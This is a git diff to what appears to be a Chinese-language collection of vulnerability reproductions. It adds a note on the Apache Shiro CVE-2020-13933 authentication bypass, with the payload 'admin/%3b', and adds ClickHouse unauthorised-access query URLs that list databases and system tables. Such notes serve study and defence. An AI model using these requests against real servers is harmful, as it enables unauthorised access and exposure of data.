diff --git a/README.md b/README.md index 3547acd..74f4621 100644 --- a/README.md +++ b/README.md @@ -438,6 +438,7 @@ * Apache OF Biz RMI Bypass RCE CVE 2021 29200 * Apache OFBiz RMI反序列化漏洞 CVE-2021-26295 * Apache ShenYu dashboardUser 账号密码泄漏漏洞 CVE-2021-37580 + * Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933 * Apache Shiro 小于1.2.4反序列化漏洞 CVE-2016-4437 * Apache SkyWalking graphql SQL注入漏洞 CVE-2020-9483 * Apache Solr JMX服务 RCE CVE-2019-12409 diff --git a/Web服务器漏洞/Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933.md b/Web服务器漏洞/Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933.md new file mode 100644 index 0000000..dd57564 --- /dev/null +++ b/Web服务器漏洞/Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933.md @@ -0,0 +1,25 @@ +# Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933 + +## 漏洞描述 + +2020年8月18日,Apache Shiro官方发布安全通告 Apache Shiro身份验证绕过漏洞(CVE-2020-13933),经过分析,攻击者可以通过构造特殊的HTTP请求实现身份验证绕过。 + +## 漏洞影响 + +``` +Apache Shiro < 1.6.0 +``` + +## 漏洞复现 + +正常访问 /admin,需要登录: + +![image-20230724162154509](images/image-20230724162154509.png) + +构造恶意请求绕过: + +``` +admin/%3b +``` + +![image-20230724162320484](images/image-20230724162320484.png) \ No newline at end of file diff --git a/Web服务器漏洞/images/image-20230724162154509.png b/Web服务器漏洞/images/image-20230724162154509.png new file mode 100644 index 0000000..c63028f Binary files /dev/null and b/Web服务器漏洞/images/image-20230724162154509.png differ diff --git a/Web服务器漏洞/images/image-20230724162320484.png b/Web服务器漏洞/images/image-20230724162320484.png new file mode 100644 index 0000000..a0a1ada Binary files /dev/null and b/Web服务器漏洞/images/image-20230724162320484.png differ diff --git a/服务器应用漏洞/ClickHouse API 数据库接口未授权访问漏洞.md b/服务器应用漏洞/ClickHouse API 数据库接口未授权访问漏洞.md index e801f40..ea3692f 100644 --- a/服务器应用漏洞/ClickHouse API 数据库接口未授权访问漏洞.md +++ b/服务器应用漏洞/ClickHouse API 数据库接口未授权访问漏洞.md @@ -26,8 +26,19 @@ ClickHouse ![img](./images/202202091258245.png) -```php -/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical +``` +http://your-ip:8123/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical +``` + +![img](images/202202091258274-16898396122771.png) + +其他的SQL语句: + +``` +http://your-ip:8123/?query=SHOW%20DATABASES +``` + +``` +http://your-ip:8123/?query=SELECT%20*%20FROM%20system.tables ``` -![img](./images/202202091258274.png) \ No newline at end of file diff --git a/服务器应用漏洞/images/202202091258274-16898396122771.png b/服务器应用漏洞/images/202202091258274-16898396122771.png new file mode 100644 index 0000000..fef0cc6 Binary files /dev/null and b/服务器应用漏洞/images/202202091258274-16898396122771.png differ